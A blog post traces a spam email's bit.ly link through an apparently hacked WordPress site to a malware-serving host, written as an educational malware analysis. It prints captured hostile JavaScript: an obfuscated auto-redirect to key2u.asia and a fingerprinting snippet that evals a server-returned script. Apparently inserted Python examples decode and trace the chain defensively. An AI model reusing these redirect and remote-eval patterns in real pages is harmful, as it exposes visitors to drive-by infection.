
How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can clicking one lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an arcane chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contains web links. Do not click on these. Some of these links might only lead to a website pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others might trigger a chain of events that leads to malware being installed in your browser or on your computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know, with brief text and a link.

[Image: 2017-10-26 Spam Mail Malware Link]

Pay close attention to the email address of the sender. It is common to receive spam mail from people whose name we know but with an email address that is not theirs. Other times it might really be their address; that is a strong indication that their computer is sending spam mail without their knowledge.

This particular link is a bit.ly link. bit.ly is a URL shortener, used in this case to obscure the true web address. This makes it more difficult for email filters to determine whether the mail contains a link to a malicious website. In this case, it resolves to

[Image: 2017-10-26 Spam Mail Malware Link resolution]

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built using WordPress. This software is one of the most prolific foundations for websites around the world, supporting over 74 million websites, almost 20% of all websites!

As with much software, WordPress evolved from a time before internet security was a big concern. WordPress sites contain vulnerabilities which allow them to be attacked and hacked. WordPress is continually updated to address security concerns. Regardless of WordPress improvements, it is still up to website owners to keep their websites up to date with those improvements. The result is that many, possibly most, WordPress websites remain vulnerable to attacks.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Because of gaps in WordPress security, “bad actors” can plant web pages and malware into a legitimate site, unbeknownst to the owners and not easily found. Email links then direct unsuspecting users to those web pages, which infect the users’ computers.
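One practical way for a site owner to find planted files of this kind is to compare the PHP files under wp-content against a known-good baseline (for example a pristine copy of the same theme and plugin versions). The following is an added example, not code from the post: it hashes every .php file in a tree and reports files that were added, modified, or removed relative to the baseline. The directory layout and file contents are constructed for the demo; the file name india-visa.php is borrowed from the theme-directory path in the post’s own link and is used here only as a placeholder.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map each .php file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for path in Path(root).rglob("*.php"):
        rel = str(path.relative_to(root)).replace(os.sep, "/")
        digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_against_baseline(baseline, current):
    """Report files that are new, changed, or missing compared with the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "removed": sorted(set(baseline) - set(current)),
    }


def build_demo_tree(root, planted):
    """Constructed sample: a tiny theme directory; with planted=True it also
    contains one unexpected PHP file and one altered theme file."""
    theme = Path(root) / "wp-content" / "themes" / "typoxp-2.1"
    theme.mkdir(parents=True)
    (theme / "index.php").write_text("<?php get_header(); ?>\n")
    (theme / "functions.php").write_text("<?php // theme functions\n")
    if planted:
        # placeholder content standing in for a planted page; not real malware
        (theme / "india-visa.php").write_text("<?php echo 'placeholder'; ?>\n")
        (theme / "functions.php").write_text("<?php // theme functions\n// altered\n")


def demo():
    """Build a clean and a tampered tree in temp dirs and diff them."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        build_demo_tree(clean, planted=False)
        build_demo_tree(live, planted=True)
        return diff_against_baseline(hash_tree(clean), hash_tree(live))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

In real use, the baseline comes from a trusted copy of the same WordPress, theme and plugin versions, and the check is run against the live document root; any file in the "added" list that lives inside a theme or plugin directory deserves a close look.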

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server”), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the web page was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, oc70.net does not look legitimate: the domain does not show any content, and the content from oc70.net/blog appears to have text that is randomly generated solely to fill the page, even if it makes little sense.

Mal-pages

Looking at the content from the URL address above brings me to a web page with a partial snippet of meaningless text. It also contained a deliberately obfuscated JavaScript program. I could only get the content by simulating a browser (or using a browser itself, which I wasn’t willing to do).

<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title> <style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style> <script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript> </head> <body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program and know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. With a bit of decoding, all the gibberish in lines 2–21 can be condensed to:

setTimeout('document.location="http://key2u.asia/71115cd04b798404/5/28430"', 500);
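The decoding above can be done mechanically without ever executing the script. The following is an added example, not code from the post: it reads the obfuscated script as plain text, collects the var = 'literal' assignments, folds the string concatenation passed to setTimeout, and pulls out the redirect target. The script text is the one captured in the post, embedded here as inert data. Two things worth noticing when running it: the if(x = 'y') guard is an assignment, not a comparison, so it is always true; and the decoded target in this capture carries a different path segment from the one in the page’s noscript fallback, which fits the author’s observation that the page changes on every load.

```python
import re

# Constructed sample: the obfuscated variable block and the setTimeout call
# captured in the post, kept here as inert text so nothing in it is executed.
OBFUSCATED_SCRIPT = r"""
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
"""

# One single-quoted string assignment:  var name = 'value';
ASSIGN_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'\s*;")
# The timer call: setTimeout(<expression containing no commas>, <milliseconds>)
TIMEOUT_RE = re.compile(r"setTimeout\(([^,]+),\s*(\d+)\)")


def parse_string_vars(script):
    """Collect every var-to-literal assignment into a name -> value table."""
    return dict(ASSIGN_RE.findall(script))


def resolve_concat(expr, env):
    """Fold an a+b+'lit'+c expression using the table; refuse anything else."""
    parts = []
    for term in (t.strip() for t in expr.split("+")):
        if len(term) >= 2 and term[0] == term[-1] == "'":
            parts.append(term[1:-1])          # inline string literal
        elif term in env:
            parts.append(env[term])           # known string variable
        else:
            raise ValueError(f"cannot statically resolve term: {term!r}")
    return "".join(parts)


def decode_timeout(script):
    """Return (decoded first argument, delay in ms), or None if no setTimeout."""
    env = parse_string_vars(script)
    m = TIMEOUT_RE.search(script)
    if m is None:
        return None
    return resolve_concat(m.group(1), env), int(m.group(2))


def extract_redirect_target(payload):
    """Pull the URL out of a decoded document.location="..." assignment."""
    m = re.search(r'document\.location\s*=\s*"([^"]+)"', payload)
    return m.group(1) if m else None


if __name__ == "__main__":
    decoded, delay_ms = decode_timeout(OBFUSCATED_SCRIPT)
    print(f"after {delay_ms} ms the browser evaluates: {decoded}")
    print("redirect target:", extract_redirect_target(decoded))
```

Because the first argument to setTimeout is a string, the browser evaluates it as code after the delay; that is why the decoder returns the assignment as text rather than performing it.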

The page’s text is actually hidden, so I am not sure why it is even in the content. After 1/2 second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
<html>
<head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>
</head>
<body>
</body>
</html>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one might be where all the badness is implemented. I spent more time than I’d planned looking at the second program. It turns out that its primary function is to load another common module (Fingerprint.js), used to interrogate your browser and system.

The real dirty work is referenced in check.js, but I haven’t been able to get into that easily, so unfortunately the investigation is paused here. But here is a look at the reference; let me know if you are smarter than I am about these things.

$(function(){
   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),
          fonts2=res[0].value,
          data={shape:shape,fonts:fonts2},
          shape2=data.shape,
          fonts=data.fonts;
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})
});

Tools and Techniques

curl is a handy command-line tool with which you can download internet content the way a browser does, without the danger of running badly behaved programs the way a browser would. It is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web browser would get before it is displayed. Finding out where the bit.ly link led was as easy as typing

$ curl http://bit.ly/2yMm2xo
<html>
<head><title>Bitly</title></head>
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in the command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser more realistically (the server can’t really know whether you are using a browser or not; it only sees what the client tells it). So I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). Next, I had curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work for the content of check.js, so I will have to think about how to do that.
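The same hop-by-hop procedure (fetch with a browser-like User-Agent, read the raw response, find the next address, repeat) can be scripted so that each step is recorded and nothing is ever executed. The following is an added example, not code from the post: a small Python walker that sends the post’s User-Agent string, refuses to auto-follow HTTP redirects so each hop is visible, and looks only at static onward links (meta refresh and anchor tags). The fake_fetch table is a constructed offline stand-in built from the three responses shown in the post; replacing it with the real fetch function performs the live lookups.

```python
import re
import urllib.error
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin

# The desktop Chrome User-Agent string used in the post.
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36")


class NextHopParser(HTMLParser):
    """Record anchor hrefs and <meta http-equiv="refresh"> targets; scripts are never run."""

    def __init__(self):
        super().__init__()
        self.refresh, self.hrefs = [], []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            self.hrefs.append(a["href"])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.refresh.append(m.group(1))


def find_next_hops(html, base_url):
    """Static onward links in priority order: meta refresh first, then anchors."""
    p = NextHopParser()
    p.feed(html)
    return [urljoin(base_url, u) for u in p.refresh + p.hrefs]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 3xx to the caller instead of following it


def fetch(url, user_agent=BROWSER_UA):
    """GET one URL with a browser-like User-Agent; returns (status, headers, body)."""
    opener = urllib.request.build_opener(_NoRedirect())
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


def walk(start_url, fetcher=fetch, max_hops=5):
    """Follow the chain one static hop at a time and return every URL visited."""
    chain, url = [start_url], start_url
    for _ in range(max_hops):
        status, headers, body = fetcher(url)
        location = next((v for k, v in headers.items() if k.lower() == "location"), None)
        if 300 <= status < 400 and location:
            nxt = urljoin(url, location)          # HTTP-level redirect
        else:
            hops = find_next_hops(body, url)      # HTML-level onward link
            if not hops:
                break
            nxt = hops[0]
        chain.append(nxt)
        url = nxt
    return chain


# Constructed offline stand-in for the three servers in the post.
BITLY_URL = "http://bit.ly/2yMm2xo"
LANDING_URL = "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"
FINAL_URL = "http://key2u.asia/71115cd04b798404/5/28430"
FAKE_SITE = {
    BITLY_URL: (200, {}, "<html><head><title>Bitly</title></head>"
                         f'<body><a href="{LANDING_URL}">moved here</a></body>'),
    # The landing page's obfuscated <script> is left out; only its <noscript> fallback is kept.
    LANDING_URL: (200, {}, "<!DOCTYPE html><html><head><meta charset='utf-8'>"
                           '<noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript>'
                           "</head><body></body></html>"),
    FINAL_URL: (200, {}, "<html><body></body></html>"),
}


def fake_fetch(url, user_agent=BROWSER_UA):
    """Offline fetcher that answers from the constructed table above."""
    return FAKE_SITE[url]


if __name__ == "__main__":
    for hop in walk(BITLY_URL, fetcher=fake_fetch):
        print(hop)
```

The walker stops at the key2u.asia page because that page has no static onward link; its next step is taken by the scripts it loads, which is exactly the point at which a practitioner should switch from fetching to reading.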
